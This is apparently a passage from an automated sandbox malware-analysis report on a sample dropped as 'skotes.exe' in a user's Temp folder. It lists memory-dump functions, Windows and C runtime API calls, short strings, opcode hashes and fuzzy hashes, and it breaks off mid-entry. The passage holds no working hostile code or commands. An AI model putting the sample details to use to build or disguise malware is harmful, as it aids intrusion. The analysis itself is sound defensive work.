                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0218F02D
                    • __freea.LIBCMT ref: 0218F053
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                    • String ID:
                    • API String ID: 2497068736-0
                    • Opcode ID: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
                    • Instruction ID: 5618c46eea911ec1807d8a8fce289b11c567e0bd93cbb7aa0f30872111996935
                    • Opcode Fuzzy Hash: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
                    • Instruction Fuzzy Hash: E33190B1A402068FCB19EFA8C4C0AADB7F6EF09314F65406AE405EB380DB359D02CF95
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 02197617
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 02197659
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 02197675
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 02197680
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021976A7
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 3897347962-0
                    • Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
                    • Instruction ID: 71417378564e37b87d84e1624967a5e749bb53db0181f3ba9a5e008a1b7b054f
                    • Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
                    • Instruction Fuzzy Hash: 682162B4A40308AFDF04EF69C594AADBBB5BF09355F1040A9E901A73A1DB30AE05CF94
                    APIs
                    • _free.LIBCMT ref: 021AF2B9
                      • Part of subcall function 021AB05C: HeapFree.KERNEL32(00000000,00000000,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?), ref: 021AB072
                      • Part of subcall function 021AB05C: GetLastError.KERNEL32(?,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?,?), ref: 021AB084
                    • _free.LIBCMT ref: 021AF2CB
                    • _free.LIBCMT ref: 021AF2DD
                    • _free.LIBCMT ref: 021AF2EF
                    • _free.LIBCMT ref: 021AF301
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
                    • Instruction ID: 6dcc52e553b7f22d29b0d029ed81dc8396c210cd63da864e617d1dacdc5a4a7d
                    • Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
                    • Instruction Fuzzy Hash: 03F0623A548640BB8630EB64E7B2C1B77EAFA107197654816F01CD7D50DB71F980CA54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
                    • Instruction ID: 9bcaa8ed0bf23d95bc4488344c597c5357d57355789ebb371c56c57e04d1ff9a
                    • Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
                    • Instruction Fuzzy Hash: A8613CB9E40619AFCF14CFA8D8905EDFBF5EF48310B2581AAD815E7740D731AE418B90
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe$P6m
                    • API String ID: 0-2251797794
                    • Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
                    • Instruction ID: 9877fc5d2851cbf22843715a15baf095f639ee753e91c7c92cd4675d6904d295
                    • Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
                    • Instruction Fuzzy Hash: AF418475E80214AFCB25DFA9DC909AFBBF9EF85310F144076E504D7290E7B18A80CB55
                    APIs
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 021A4AE6
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 021A4B9A
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable___except_validate_context_record
                    • String ID: S9C$csm
                    • API String ID: 3480331319-582408667
                    • Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
                    • Instruction ID: 849fef57396c4350b29935c1ceccf347658319b512848d2613d3bfe154684f3b
                    • Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
                    • Instruction Fuzzy Hash: B941C73CA41204AFCF20DF68C894BADBBB5AF45318F148155ED155B391D7B1EA05CF91
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 021A58E7
                    • CatchIt.LIBVCRUNTIME ref: 021A59CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
                    • Instruction ID: 5bfb22534e81a9891449236d4a6edb956071d3b7bf6137750da205b69c77446c
                    • Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
                    • Instruction Fuzzy Hash: 8641767AD40209BFCF16DFA8CC90AAEBBB6BF08314F548099F914AB221D3359950DF51
                    APIs
                    • _free.LIBCMT ref: 021B2B27
                    • _free.LIBCMT ref: 021B2B7D
                      • Part of subcall function 021B2959: _free.LIBCMT ref: 021B29B1
                      • Part of subcall function 021B2959: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021B29C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
                    • Instruction ID: b0bcfcb615c6bbd6a29e6047dbbf4f2bb5f3fdbad061140900d846fb4c1efb25
                    • Opcode Fuzzy Hash: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
                    • Instruction Fuzzy Hash: 212138328402246BDB36AB348E44EEE77799F95364F110395DDA4A30A0EF704A89CE91
                    APIs
                    • __EH_prolog3.LIBCMT ref: 02190F31
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 02190F3E
                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 02190F91
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
                    • String ID: p[F
                    • API String ID: 220083066-1832964472
                    • Opcode ID: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
                    • Instruction ID: 453c76c86dba5da1cdb49f4a0973b435b5358144bda47e18f96c50a6bd511b1c
                    • Opcode Fuzzy Hash: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
                    • Instruction Fuzzy Hash: A0017C70A893059FDF54BBB8699036D7AA2AB4C750F50446EE405EB281EB748B408F9A
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,%C,?,021A0C8C,000000FF,0000000C), ref: 02190098
                    • GetLastError.KERNEL32(?,021A0C8C,?,00430925,?,?,?,?,?,?,02195F15,?), ref: 021900A7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021900BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: %C
                    • API String ID: 2296417588-4291884666
                    • Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction ID: e70c258cb1770638dcce0caf34be5cec82fb5e9b64dbdfaef96d7624ceea455e
                    • Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction Fuzzy Hash: F8F0A03954020AFBCF00EFA5DD04EAE37ADAB04705F240624B520E20D1DB35D6049B64
                    APIs
                    • RtlLeaveCriticalSection.NTDLL(00465750), ref: 0218D42D
                    • WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,0218D39D,00000064,?,0045007C,?,02177854,00468680), ref: 0218D43E
                    • RtlEnterCriticalSection.NTDLL(00465750), ref: 0218D445
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveObjectSingleWait
                    • String ID: PWF
                    • API String ID: 501323975-4189640852
                    • Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
                    • Instruction ID: 5fdf8b1e8affce6683962649fc04e10b0dc305a791a2de6126be133c86ad411d
                    • Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
                    • Instruction Fuzzy Hash: 14E01235541B24F7C7022B50EC49A9E3F69EB45753F144031FA05665619B656C40CBDF
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,00462014), ref: 02178011
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02178072
                    • GetProcAddress.KERNEL32(00000000), ref: 02178079
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0217813E
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
                    • Instruction ID: 393616de59abfc7fefeaf590048a29409f7f1898411d31ec95adfca352cffb1f
                    • Opcode Fuzzy Hash: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
                    • Instruction Fuzzy Hash: 09E1D6B0E40254ABDB14BB68CD8A79DBB73AB82714FA4029CD815673C1EB754E458F83
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
                    • Instruction ID: ea99d2b373ede37230178bf4302a96f99e2222624665c8cbb92ea1d12664d824
                    • Opcode Fuzzy Hash: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
                    • Instruction Fuzzy Hash: 0DB1697A9406859FDB15CF28C8A1BFEBBF6EF45300F1581AAE854DB741D7358902CBA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                    • Instruction ID: 06f93ffecd728c896489ddb8256a5293efd8f4fdf7021cd6a79d5ffbf966d5e3
                    • Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                    • Instruction Fuzzy Hash: 8B51E37AA88706FFDB288F50D8A0B7A77B6EF80704F94452DEC0247590E7B1E884CB50
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 02178660
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021786C7
                    • GetProcAddress.KERNEL32(00000000), ref: 021786CE
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
                    • Instruction ID: 538ea50156d6755613a9bcb71d2a3c114af7ead1edf309f543f2cad0a34ff2a6
                    • Opcode Fuzzy Hash: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
                    • Instruction Fuzzy Hash: 1F51F771D402089FDB14EB74DD887DDB776EB85310F5042A9E815A73C0EB359A848F91
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 990b4cbf17d9b67f495cfdb98441b6cd7864cce9700c16cb00c285aa5a0292a8
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: 035190399442099FCF11CF6CC4A06EEFBF5EF05218F15545AE861A7351D7B2A948CB90
                    APIs
                    • _free.LIBCMT ref: 021B6305
                    • _free.LIBCMT ref: 021B632E
                    • SetEndOfFile.KERNEL32(00000000,021B1C71,00000000,021AAEF9,?,?,?,?,?,?,?,021B1C71,021AAEF9,00000000), ref: 021B6360
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,021B1C71,021AAEF9,00000000,?,?,?,?,00000000), ref: 021B637C
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
                    • Instruction ID: 04c5adffca701fdf787d1933ccd9d5fc011a91be024802ae91256f17b2db1f87
                    • Opcode Fuzzy Hash: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
                    • Instruction Fuzzy Hash: BA41E636D806819FDB12ABB8CD40BDF77BEAF65320F150564E838E72A0EB34C5418B60
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
                    • Instruction ID: d9f4214138a7bc242b3b687111a5b73fe06e3663a995188ca2af0706b8c12476
                    • Opcode Fuzzy Hash: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
                    • Instruction Fuzzy Hash: 4D41FDB0A806059FDB24EF64C984B5AB7F8BF44324F0045AED826D7680EB34E604CFD1
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 021A1DA9
                      • Part of subcall function 021A2078: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021A1AF1), ref: 021A2088
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 021A1DBE
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021A1DCD
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021A1E91
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID:
                    • API String ID: 1312548968-0
                    • Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
                    • Instruction ID: 47b089488e10bcfbbc76e0d0353b5bb2fd4543e7debb41c1bf6acc14c5b6dbfa
                    • Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
                    • Instruction Fuzzy Hash: 9131F639A40214BFCF1AEF68C9A4B6D737ABF44310F204569ED1597281DB71EE05CB94
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 02192F76
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
                    • Instruction ID: d7cd402c7079640e2102ae22b7dc2aede0cb07f9a6ce0f4708e42914ab2281e3
                    • Opcode Fuzzy Hash: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
                    • Instruction Fuzzy Hash: 57315775E40309EFCF14DF94C4C0BAEBBB9BF44344F1804AAD965AB246D731AA45CBA0
                    APIs
                      • Part of subcall function 021A6C33: _free.LIBCMT ref: 021A6C41
                      • Part of subcall function 021AEB8D: WideCharToMultiByte.KERNEL32(02178A07,00000000,0045FB20,00000000,02178A07,02178A07,021B08B7,?,0045FB20,?,00000000,?,021B0626,0000FDE9,00000000,?), ref: 021AEC2F
                    • GetLastError.KERNEL32 ref: 021ADC1E
                    • __dosmaperr.LIBCMT ref: 021ADC25
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 021ADC64
                    • __dosmaperr.LIBCMT ref: 021ADC6B
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
                    • Instruction ID: 77eefaf1a967b9ed4671d9b518c1015343ebf3fab727a587b8e5c374f35a74ab
                    • Opcode Fuzzy Hash: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
                    • Instruction Fuzzy Hash: 2A21D3B9680A19AFDB219F61ACA0E6BB7ADEF05374740452CE83983584D770ED008FA0
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 021A1AEC
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021A1B0B
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 021A1B52
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1284976207-0
                    • Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
                    • Instruction ID: 8c044362cec708af3e1f081d6476671c4e97a5a11fec9a0bd5bbe16fae523fb1
                    • Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
                    • Instruction Fuzzy Hash: 1A21293D740615AFCB18AB28D8B4B6D73B6BF84334F04052AE41A872D1DB64E841CED4
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 021A0D50
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021A0D38
                      • Part of subcall function 02199196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021991B7
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021A0DB3
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 021A0DB8
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
                    • Instruction ID: 09d6999a00de9c5c2cc9a650d633d83ccf7885388abea0457a3d0b74753900ca
                    • Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
                    • Instruction Fuzzy Hash: DA212679640214AFCB10EB68CC44E6EB7BDEF48360F04016AFA15A32D0CB71BD01CEA5
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
                    • Instruction ID: e74eafdc4bd23b97b53e03dcae908f04e305c6dcff5b139d44874288232b3969
                    • Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
                    • Instruction Fuzzy Hash: DC21D539AC9364FBCB318BA49C65B1A37589F317A8F110525FC17A72A1D730EE00C6E4
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 02195168
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0219518B
                    • __EH_prolog3.LIBCMT ref: 021951A6
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 021951CD
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 2642201467-0
                    • Opcode ID: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
                    • Instruction ID: 1e3163718ada381d4d891b9ef63b0442349577c831675ce4b3e91b34c12b025e
                    • Opcode Fuzzy Hash: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
                    • Instruction Fuzzy Hash: 1B21CF35640205FFCF15EFA8C891AAD73B6FF48311F50406AE916AB690DB71AE02CF95
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 021A162D
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021A15DE
                      • Part of subcall function 02198582: SafeRWList.LIBCONCRT ref: 02198593
                    • SafeRWList.LIBCONCRT ref: 021A1623
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021A1643
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
                    • Instruction ID: ae2bcaab04ffee2bb6dc5aac69f35477a84096cf95c2d7d396811c6b9308d70b
                    • Opcode Fuzzy Hash: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
                    • Instruction Fuzzy Hash: 5921077169020AEFCB04DF24C880FA5FBEABF81318F54C2A6D40A4B541D771E58ACBC0
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
